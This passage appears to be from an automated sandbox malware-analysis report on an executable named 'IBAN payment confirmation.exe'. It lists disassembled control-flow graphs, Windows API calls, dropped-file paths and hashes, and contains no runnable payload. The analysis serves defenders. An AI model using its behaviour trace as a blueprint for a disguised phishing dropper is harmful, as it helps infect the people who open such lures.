                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                                              • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                              • String ID: $M$N
                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                              • Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                              • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                                              • Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                              • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 483 405f0c-405f17 484 405f19-405f28 483->484 485 405f2a-405f40 483->485 484->485 486 405f46-405f53 485->486 487 406158-40615e 485->487 486->487 488 405f59-405f60 486->488 489 406164-40616f 487->489 490 405f65-405f72 487->490 488->487 492 406171-406175 call 405eea 489->492 493 40617a-40617b 489->493 490->489 491 405f78-405f84 490->491 494 406145 491->494 495 405f8a-405fc6 491->495 492->493 497 406153-406156 494->497 498 406147-406151 494->498 499 4060e6-4060ea 495->499 500 405fcc-405fd7 GetVersion 495->500 497->487 498->487 503 4060ec-4060f0 499->503 504 40611f-406123 499->504 501 405ff1 500->501 502 405fd9-405fdd 500->502 505 405ff8-405fff 501->505 502->501 508 405fdf-405fe3 502->508 509 406100-40610d call 405eea 503->509 510 4060f2-4060fe call 405e31 503->510 506 406132-406143 lstrlenW 504->506 507 406125-40612d call 405f0c 504->507 511 406001-406003 505->511 512 406004-406006 505->512 506->487 507->506 508->501 515 405fe5-405fe9 508->515 520 406112-40611b 509->520 510->520 511->512 518 406042-406045 512->518 519 406008-40602e call 405db7 512->519 515->501 521 405feb-405fef 515->521 524 406055-406058 518->524 525 406047-406053 GetSystemDirectoryW 518->525 531 406034-40603d call 405f0c 519->531 532 4060cd-4060d1 519->532 520->506 523 40611d 520->523 521->505 527 4060de-4060e4 call 40617e 523->527 529 4060c3-4060c5 524->529 530 40605a-406068 GetWindowsDirectoryW 524->530 528 4060c7-4060cb 525->528 527->506 528->527 528->532 529->528 533 40606a-406074 529->533 530->529 531->528 532->527 536 4060d3-4060d9 lstrcatW 532->536 538 406076-406079 533->538 539 40608e-4060a4 SHGetSpecialFolderLocation 533->539 536->527 538->539 543 40607b-406082 538->543 540 4060a6-4060bd SHGetPathFromIDListW CoTaskMemFree 539->540 541 4060bf 539->541 540->528 540->541 541->529 544 40608a-40608c 543->544 544->528 544->539
                                                                                                                              APIs
                                                                                                                              • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604D
                                                                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406060
                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060AA
                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                                              • lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                              • API String ID: 900638850-1230650788
                                                                                                                              • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                              • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                                              • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                              • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 545 405772-405798 call 405a3d 548 4057b1-4057b8 545->548 549 40579a-4057ac DeleteFileW 545->549 551 4057ba-4057bc 548->551 552 4057cb-4057db call 405eea 548->552 550 40592e-405932 549->550 553 4057c2-4057c5 551->553 554 4058dc-4058e1 551->554 558 4057ea-4057eb call 405981 552->558 559 4057dd-4057e8 lstrcatW 552->559 553->552 553->554 554->550 557 4058e3-4058e6 554->557 560 4058f0-4058f8 call 40622d 557->560 561 4058e8-4058ee 557->561 563 4057f0-4057f4 558->563 559->563 560->550 569 4058fa-40590e call 405935 call 40572a 560->569 561->550 566 405800-405806 lstrcatW 563->566 567 4057f6-4057fe 563->567 568 40580b-405827 lstrlenW FindFirstFileW 566->568 567->566 567->568 570 4058d1-4058d5 568->570 571 40582d-405835 568->571 585 405910-405913 569->585 586 405926-405929 call 405194 569->586 570->554 576 4058d7 570->576 573 405855-405869 call 405eea 571->573 574 405837-40583f 571->574 587 405880-40588b call 40572a 573->587 588 40586b-405873 573->588 577 405841-405849 574->577 578 4058b4-4058c4 FindNextFileW 574->578 576->554 577->573 581 40584b-405853 577->581 578->571 584 4058ca-4058cb FindClose 578->584 581->573 581->578 584->570 585->561 589 405915-405924 call 405194 call 405d84 585->589 586->550 598 4058ac-4058af call 405194 587->598 599 40588d-405890 587->599 588->578 590 405875-40587e call 405772 588->590 589->550 590->578 598->578 600 405892-4058a2 call 405194 call 405d84 599->600 601 4058a4-4058aa 599->601 600->578 601->578
                                                                                                                              APIs
                                                                                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\IBAN payment confirmation.exe"), ref: 0040579B
                                                                                                                              • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\IBAN payment confirmation.exe"), ref: 004057E3
                                                                                                                              • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\IBAN payment confirmation.exe"), ref: 00405806
                                                                                                                              • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\IBAN payment confirmation.exe"), ref: 0040580C
                                                                                                                              • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\IBAN payment confirmation.exe"), ref: 0040581C
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                                              Strings
                                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405780
                                                                                                                              • \*.*, xrefs: 004057DD
                                                                                                                              • "C:\Users\user\Desktop\IBAN payment confirmation.exe", xrefs: 0040577B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                              • String ID: "C:\Users\user\Desktop\IBAN payment confirmation.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                                                                              • API String ID: 2035342205-1830475424
                                                                                                                              • Opcode ID: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                              • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                                              • Opcode Fuzzy Hash: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                              • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                              • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                                              • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                              • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,771B2EE0,00405792,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406238
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                              • String ID: WB
                                                                                                                              • API String ID: 2295610775-2854515933
                                                                                                                              • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                              • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                                              • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                              • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 310444273-0
                                                                                                                              • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                              • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                                                                              • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                              • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9
                                                                                                                              APIs
                                                                                                                              • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Mixerudstyr, xrefs: 004020FB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInstance
                                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Mixerudstyr
                                                                                                                              • API String ID: 542301482-3758315044
                                                                                                                              • Opcode ID: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                                                              • Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
                                                                                                                              • Opcode Fuzzy Hash: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                                                              • Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 238 4038b4-4038cc call 406254 241 4038e0-403917 call 405db7 238->241 242 4038ce-4038de call 405e31 238->242 247 403919-40392a call 405db7 241->247 248 40392f-403935 lstrcatW 241->248 251 40393a-403963 call 403b8a call 405a3d 242->251 247->248 248->251 256 4039f5-4039fd call 405a3d 251->256 257 403969-40396e 251->257 263 403a0b-403a30 LoadImageW 256->263 264 4039ff-403a06 call 405f0c 256->264 257->256 258 403974-40399c call 405db7 257->258 258->256 265 40399e-4039a2 258->265 267 403ab1-403ab9 call 40140b 263->267 268 403a32-403a62 RegisterClassW 263->268 264->263 269 4039b4-4039c0 lstrlenW 265->269 270 4039a4-4039b1 call 405962 265->270 281 403ac3-403ace call 403b8a 267->281 282 403abb-403abe 267->282 271 403b80 268->271 272 403a68-403aac SystemParametersInfoW CreateWindowExW 268->272 276 4039c2-4039d0 lstrcmpiW 269->276 277 4039e8-4039f0 call 405935 call 405eea 269->277 270->269 274 403b82-403b89 271->274 272->267 276->277 280 4039d2-4039dc GetFileAttributesW 276->280 277->256 284 4039e2-4039e3 call 405981 280->284 285 4039de-4039e0 280->285 291 403ad4-403af1 ShowWindow LoadLibraryW 281->291 292 403b57-403b5f call 405267 281->292 282->274 284->277 285->277 285->284 293 403af3-403af8 LoadLibraryW 291->293 294 403afa-403b0c GetClassInfoW 291->294 300 403b61-403b67 292->300 301 403b79-403b7b call 40140b 292->301 293->294 296 403b24-403b47 DialogBoxParamW call 40140b 294->296 297 403b0e-403b1e GetClassInfoW RegisterClassW 294->297 303 403b4c-403b55 call 403804 296->303 297->296 300->282 304 403b6d-403b74 call 40140b 300->304 301->271 303->274 304->282
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                              • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000,"C:\Users\user\Desktop\IBAN payment confirmation.exe"), ref: 00403935
                                                                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\), ref: 004039B5
                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 004039D3
                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet), ref: 00403A1C
                                                                                                                                • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                              • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                                              • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
